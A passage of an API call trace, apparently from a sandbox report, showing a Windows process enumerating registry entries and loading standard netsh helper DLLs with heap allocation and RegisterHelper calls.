returned 1 [0145.112] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="whhelper", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0145.112] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0145.112] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0145.112] GetProcessHeap () returned 0x2d0000 [0145.112] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1b8) returned 0x30b560 [0145.112] GetProcessHeap () returned 0x2d0000 [0145.112] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x30e2d0 [0145.112] GetProcessHeap () returned 0x2d0000 [0145.112] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x30ead0 [0145.112] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0145.113] GetProcessHeap () returned 0x2d0000 [0145.113] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30b3c0 | out: hHeap=0x2d0000) returned 1 [0145.113] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef3220000 [0145.362] GetProcAddress (hModule=0x7fef3220000, lpProcName="InitHelperDll") returned 0x7fef322210c [0145.362] InitHelperDll () returned 0x0 [0145.362] RegisterHelper () returned 0x0 [0145.362] GetProcessHeap () returned 0x2d0000 [0145.362] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x9a0) returned 0x3125a0 [0145.362] GetProcessHeap () returned 0x2d0000 [0145.362] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x311c50 | out: hHeap=0x2d0000) returned 1 [0145.363] RegEnumValueW (in: hKey=0x90, dwIndex=0xa, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="hnetmon", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0145.363] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0145.363] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0145.363] GetProcessHeap () returned 0x2d0000 [0145.363] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1e0) returned 0x30ef40 [0145.363] GetProcessHeap () returned 0x2d0000 [0145.363] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x30e2f0 [0145.363] GetProcessHeap () returned 0x2d0000 [0145.363] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x30e310 [0145.363] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0145.363] GetProcessHeap () returned 0x2d0000 [0145.363] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30b560 | out: hHeap=0x2d0000) returned 1 [0145.363] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef3210000 [0147.966] GetProcAddress (hModule=0x7fef3210000, lpProcName="InitHelperDll") returned 0x7fef32122a4 [0147.966] InitHelperDll () returned 0x0 [0147.966] RegisterHelper () returned 0x0 [0147.966] GetProcessHeap () returned 0x2d0000 [0147.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x9f8) returned 0x312f50 [0147.966] GetProcessHeap () returned 0x2d0000 [0147.966] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3125a0 | out: hHeap=0x2d0000) returned 1 [0147.966] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="rpc", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0147.966] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0147.966] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0147.966] GetProcessHeap () returned 0x2d0000 [0147.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x208) returned 0x313950 [0147.966] GetProcessHeap () returned 0x2d0000 [0147.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x8) returned 0x30b6f0 [0147.966] GetProcessHeap () returned 0x2d0000 [0147.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x16) returned 0x30e390 [0147.966] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0147.966] GetProcessHeap () returned 0x2d0000 [0147.967] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30ef40 | out: hHeap=0x2d0000) returned 1 [0147.967] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef2f10000 [0148.515] GetProcAddress (hModule=0x7fef2f10000, lpProcName="InitHelperDll") returned 0x7fef2f12e88 [0148.515] InitHelperDll () returned 0x0 [0148.515] RegisterHelper () returned 0x0 [0148.515] GetProcessHeap () returned 0x2d0000 [0148.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xa50) returned 0x3122b0 [0148.515] GetProcessHeap () returned 0x2d0000 [0148.515] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x312f50 | out: hHeap=0x2d0000) returned 1 [0148.515] RegisterHelper () returned 0x0 [0148.515] GetProcessHeap () returned 0x2d0000 [0148.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xaa8) returned 0x312d10 [0148.515] GetProcessHeap () returned 0x2d0000 [0148.515] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3122b0 | out: hHeap=0x2d0000) returned 1 [0148.515] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="dot3cfg", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0148.515] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0148.515] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0148.515] GetProcessHeap () returned 0x2d0000 [0148.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x230) returned 0x30ef40 [0148.515] GetProcessHeap () returned 0x2d0000 [0148.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x30e3b0 [0148.515] GetProcessHeap () returned 0x2d0000 [0148.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x30e3d0 [0148.515] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0148.515] GetProcessHeap () returned 0x2d0000 [0148.515] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x313950 | out: hHeap=0x2d0000) returned 1 [0148.515] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef2c90000 [0151.677] GetProcAddress (hModule=0x7fef2c90000, lpProcName="InitHelperDll") returned 0x7fef2c9390c [0151.677] InitHelperDll () returned 0x0 [0151.677] RegisterHelper () returned 0x0 [0151.677] GetProcessHeap () returned 0x2d0000 [0151.677] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb00) returned 0x314fd0 [0151.677] GetProcessHeap () returned 0x2d0000 [0151.677] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x312d10 | out: hHeap=0x2d0000) returned 1 [0151.677] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="napmontr", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0151.677] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0151.677] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0151.677] GetProcessHeap () returned 0x2d0000 [0151.677] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x258) returned 0x315ae0 [0151.678] GetProcessHeap () returned 0x2d0000 [0151.678] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x30e470 [0151.678] GetProcessHeap () returned 0x2d0000 [0151.678] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x313be0 [0151.678] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0151.678] GetProcessHeap () returned 0x2d0000 [0151.678] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x30ef40 | out: hHeap=0x2d0000) returned 1 [0151.678] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef29a0000 [0154.625] GetProcAddress (hModule=0x7fef29a0000, lpProcName="InitHelperDll") returned 0x7fef29b048c [0154.625] InitHelperDll () returned 0x0 [0154.625] RegisterHelper () returned 0x0 [0154.625] GetProcessHeap () returned 0x2d0000 [0154.625] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb58) returned 0x315fd0 [0154.625] GetProcessHeap () returned 0x2d0000 [0154.626] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314fd0 | out: hHeap=0x2d0000) returned 1 [0154.626] RegisterHelper () returned 0x0 [0154.626] GetProcessHeap () returned 0x2d0000 [0154.626] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xbb0) returned 0x316b30 [0154.626] GetProcessHeap () returned 0x2d0000 [0154.626] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x315fd0 | out: hHeap=0x2d0000) returned 1 [0154.626] RegisterHelper () returned 0x0 [0154.626] GetProcessHeap () returned 0x2d0000 [0154.626] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc08) returned 0x3176f0 [0154.626] GetProcessHeap () returned 0x2d0000 [0154.626] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x316b30 | out: hHeap=0x2d0000) returned 1 [0154.626] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="nshipsec", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0154.627] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0154.627] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0154.627] GetProcessHeap () returned 0x2d0000 [0154.627] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x280) returned 0x312ec0 [0154.627] GetProcessHeap () returned 0x2d0000 [0154.627] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x30e530 [0154.627] GetProcessHeap () returned 0x2d0000 [0154.627] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x312ab0 [0154.627] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0154.627] GetProcessHeap () returned 0x2d0000 [0154.627] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x315ae0 | out: hHeap=0x2d0000) returned 1 [0154.627] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x7fef28a0000 [0159.174] GetProcAddress (hModule=0x7fef28a0000, lpProcName="InitHelperDll") returned 0x7fef28a6230 [0159.175] InitHelperDll () returned 0x0 [0159.175] RegisterHelper () returned 0x0 [0159.175] GetProcessHeap () returned 0x2d0000 [0159.175] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xc60) returned 0x31cd30 [0159.175] GetProcessHeap () returned 0x2d0000 [0159.175] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x3176f0 | out: hHeap=0x2d0000) returned 1 [0159.175] RegisterHelper () returned 0x0 [0159.175] GetProcessHeap () returned 0x2d0000 [0159.175] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xcb8) returned 0x316fd0 [0159.175] GetProcessHeap () returned 0x2d0000 [0159.175] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31cd30 | out: hHeap=0x2d0000) returned 1 [0159.175] RegisterHelper () returned 0x0 [0159.175] GetProcessHeap () returned 0x2d0000 [0159.175] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xd10) returned 0x31cd30 [0159.175] GetProcessHeap () returned 0x2d0000 [0159.175] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x316fd0 | out: hHeap=0x2d0000) returned 1 [0159.271] RegEnumValueW (in: hKey=0x90, dwIndex=0xf, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="nettrace", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0159.271] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0159.271] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0159.271] GetProcessHeap () returned 0x2d0000 [0159.272] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2a8) returned 0x316fd0 [0159.272] GetProcessHeap () returned 0x2d0000 [0159.272] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x30e710 [0159.272] GetProcessHeap () returned 0x2d0000 [0159.272] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x315510 [0159.272] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0159.272] GetProcessHeap () returned 0x2d0000 [0159.272] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2d0000) returned 1 [0159.272] LoadLibraryW (lpLibFileName="NETTRACE.DLL") returned 0x7fef26d0000 [0167.061] GetProcAddress (hModule=0x7fef26d0000, lpProcName="InitHelperDll") returned 0x7fef2717360 [0167.061] InitHelperDll () returned 0x0 [0167.061] RegisterHelper () returned 0x0 [0167.061] GetProcessHeap () returned 0x2d0000 [0167.061] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xd68) returned 0x322610 [0167.061] GetProcessHeap () returned 0x2d0000 [0167.061] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31cd30 | out: hHeap=0x2d0000) returned 1 [0167.062] RegEnumValueW (in: hKey=0x90, dwIndex=0x10, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="WcnNetsh", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0167.062] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0167.062] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0167.062] GetProcessHeap () returned 0x2d0000 [0167.062] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2d0) returned 0x323380 [0167.062] GetProcessHeap () returned 0x2d0000 [0167.062] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x30e610 [0167.062] GetProcessHeap () returned 0x2d0000 [0167.062] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x322310 [0167.062] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0167.062] GetProcessHeap () returned 0x2d0000 [0167.062] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x316fd0 | out: hHeap=0x2d0000) returned 1 [0167.062] LoadLibraryW (lpLibFileName="WCNNETSH.DLL") returned 0x7fef2680000 [0169.686] GetProcAddress (hModule=0x7fef2680000, lpProcName="InitHelperDll") returned 0x7fef26828e4 [0169.686] InitHelperDll () returned 0x0 [0169.686] RegisterHelper () returned 0x0 [0169.686] GetProcessHeap () returned 0x2d0000 [0169.686] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xdc0) returned 0x324e60 [0169.687] GetProcessHeap () returned 0x2d0000 [0169.687] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x322610 | out: hHeap=0x2d0000) returned 1 [0169.687] RegEnumValueW (in: hKey=0x90, dwIndex=0x11, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="p2pnetsh", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0169.687] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0169.687] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0169.687] GetProcessHeap () returned 0x2d0000 [0169.687] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2f8) returned 0x316fd0 [0169.687] GetProcessHeap () returned 0x2d0000 [0169.687] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x12) returned 0x30e630 [0169.687] GetProcessHeap () returned 0x2d0000 [0169.687] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x323960 [0169.687] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0169.687] GetProcessHeap () returned 0x2d0000 [0169.687] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x323380 | out: hHeap=0x2d0000) returned 1 [0169.687] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x7fef2650000 [0175.126] GetProcAddress (hModule=0x7fef2650000, lpProcName="InitHelperDll") returned 0x7fef2655568 [0175.126] InitHelperDll () returned 0x0 [0175.126] RegisterHelper () returned 0x0 [0175.126] GetProcessHeap () returned 0x2d0000 [0175.126] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe18) returned 0x32ae50 [0175.127] GetProcessHeap () returned 0x2d0000 [0175.127] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x324e60 | out: hHeap=0x2d0000) returned 1 [0175.127] RegisterHelper () returned 0x0 [0175.127] GetProcessHeap () returned 0x2d0000 [0175.127] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xe70) returned 0x32bc70 [0175.127] GetProcessHeap () returned 0x2d0000 [0175.127] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ae50 | out: hHeap=0x2d0000) returned 1 [0175.127] RegisterHelper () returned 0x0 [0175.127] GetProcessHeap () returned 0x2d0000 [0175.127] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xec8) returned 0x32caf0 [0175.127] GetProcessHeap () returned 0x2d0000 [0175.128] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32bc70 | out: hHeap=0x2d0000) returned 1 [0175.128] RegisterHelper () returned 0x0 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xf20) returned 0x32ae50 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32caf0 | out: hHeap=0x2d0000) returned 1 [0175.128] RegisterHelper () returned 0x0 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xf78) returned 0x32bd80 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ae50 | out: hHeap=0x2d0000) returned 1 [0175.128] RegisterHelper () returned 0x0 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xfd0) returned 0x32cd00 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32bd80 | out: hHeap=0x2d0000) returned 1 [0175.128] RegisterHelper () returned 0x0 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1028) returned 0x32ae50 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32cd00 | out: hHeap=0x2d0000) returned 1 [0175.128] RegisterHelper () returned 0x0 [0175.128] GetProcessHeap () returned 0x2d0000 [0175.128] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1080) returned 0x32be80 [0175.129] GetProcessHeap () returned 0x2d0000 [0175.129] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ae50 | out: hHeap=0x2d0000) returned 1 [0175.129] RegisterHelper () returned 0x0 [0175.129] GetProcessHeap () returned 0x2d0000 [0175.129] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10d8) returned 0x32cf10 [0175.129] GetProcessHeap () returned 0x2d0000 [0175.129] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32be80 | out: hHeap=0x2d0000) returned 1 [0175.129] RegisterHelper () returned 0x0 [0175.129] GetProcessHeap () returned 0x2d0000 [0175.129] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1130) returned 0x32dff0 [0175.129] GetProcessHeap () returned 0x2d0000 [0175.129] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32cf10 | out: hHeap=0x2d0000) returned 1 [0175.129] RegEnumValueW (in: hKey=0x90, dwIndex=0x12, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="wwancfg", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0175.129] _wcsicmp (_String1="wwancfg.dll", _String2="ipxmontr.dll") returned 14 [0175.129] _wcsicmp (_String1="wwancfg.dll", _String2="ipxpromn.dll") returned 14 [0175.129] GetProcessHeap () returned 0x2d0000 [0175.129] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x320) returned 0x31d140 [0175.130] GetProcessHeap () returned 0x2d0000 [0175.130] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x30e690 [0175.130] GetProcessHeap () returned 0x2d0000 [0175.130] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x30e670 [0175.130] _wcsupr (in: _String="wwancfg.dll" | out: _String="WWANCFG.DLL") returned="WWANCFG.DLL" [0175.130] GetProcessHeap () returned 0x2d0000 [0175.130] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x316fd0 | out: hHeap=0x2d0000) returned 1 [0175.130] LoadLibraryW (lpLibFileName="WWANCFG.DLL") returned 0x7fef2550000 [0176.652] GetProcAddress (hModule=0x7fef2550000, lpProcName="InitHelperDll") returned 0x7fef25520c8 [0176.652] InitHelperDll () returned 0x0 [0176.652] RegisterHelper () returned 0x0 [0176.653] GetProcessHeap () returned 0x2d0000 [0176.653] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1188) returned 0x32ae50 [0176.653] GetProcessHeap () returned 0x2d0000 [0176.653] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32dff0 | out: hHeap=0x2d0000) returned 1 [0176.653] RegEnumValueW (in: hKey=0x90, dwIndex=0x13, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="wlancfg", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0176.653] _wcsicmp (_String1="wlancfg.dll", _String2="ipxmontr.dll") returned 14 [0176.653] _wcsicmp (_String1="wlancfg.dll", _String2="ipxpromn.dll") returned 14 [0176.653] GetProcessHeap () returned 0x2d0000 [0176.653] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x348) returned 0x324e60 [0176.653] GetProcessHeap () returned 0x2d0000 [0176.653] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x317970 [0176.653] GetProcessHeap () returned 0x2d0000 [0176.653] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x18) returned 0x3179b0 [0176.653] _wcsupr (in: _String="wlancfg.dll" | out: _String="WLANCFG.DLL") returned="WLANCFG.DLL" [0176.653] GetProcessHeap () returned 0x2d0000 [0176.653] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x31d140 | out: hHeap=0x2d0000) returned 1 [0176.653] LoadLibraryW (lpLibFileName="WLANCFG.DLL") returned 0x7fef2520000 [0179.011] GetProcAddress (hModule=0x7fef2520000, lpProcName="InitHelperDll") returned 0x7fef252613c [0179.011] InitHelperDll () returned 0x0 [0179.011] RegisterHelper () returned 0x0 [0179.011] GetProcessHeap () returned 0x2d0000 [0179.011] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x11e0) returned 0x32cfe0 [0179.011] GetProcessHeap () returned 0x2d0000 [0179.011] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32ae50 | out: hHeap=0x2d0000) returned 1 [0179.011] RegEnumValueW (in: hKey=0x90, dwIndex=0x14, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="peerdistsh", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0179.011] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxmontr.dll") returned 7 [0179.011] _wcsicmp (_String1="peerdistsh.dll", _String2="ipxpromn.dll") returned 7 [0179.011] GetProcessHeap () returned 0x2d0000 [0179.011] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x370) returned 0x3251b0 [0179.011] GetProcessHeap () returned 0x2d0000 [0179.011] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x16) returned 0x3179d0 [0179.011] GetProcessHeap () returned 0x2d0000 [0179.011] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1e) returned 0x322fa0 [0179.011] _wcsupr (in: _String="peerdistsh.dll" | out: _String="PEERDISTSH.DLL") returned="PEERDISTSH.DLL" [0179.011] GetProcessHeap () returned 0x2d0000 [0179.011] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x324e60 | out: hHeap=0x2d0000) returned 1 [0179.012] LoadLibraryW (lpLibFileName="PEERDISTSH.DLL") returned 0x7fef50b0000 [0180.011] GetProcAddress (hModule=0x7fef50b0000, lpProcName="InitHelperDll") returned 0x7fef512e69c [0180.011] InitHelperDll () returned 0x0 [0180.108] RegisterHelper () returned 0x0 [0180.108] GetProcessHeap () returned 0x2d0000 [0180.108] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1238) returned 0x32e1d0 [0180.108] GetProcessHeap () returned 0x2d0000 [0180.108] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32cfe0 | out: hHeap=0x2d0000) returned 1 [0180.108] RegisterHelper () returned 0x0 [0180.108] GetProcessHeap () returned 0x2d0000 [0180.108] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1290) returned 0x32f410 [0180.109] GetProcessHeap () returned 0x2d0000 [0180.109] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x32e1d0 | out: hHeap=0x2d0000) returned 1 [0180.109] RegCloseKey (hKey=0x90) returned 0x0 [0180.109] GetProcessHeap () returned 0x2d0000 [0180.109] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2310 | out: hHeap=0x2d0000) returned 1 [0180.109] GetProcessHeap () returned 0x2d0000 [0180.109] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ee060 | out: hHeap=0x2d0000) returned 1 [0180.110] GetProcessHeap () returned 0x2d0000 [0180.110] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x70) returned 0x2fc000 [0180.111] GetProcessHeap () returned 0x2d0000 [0180.111] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0180.111] RegisterContext () 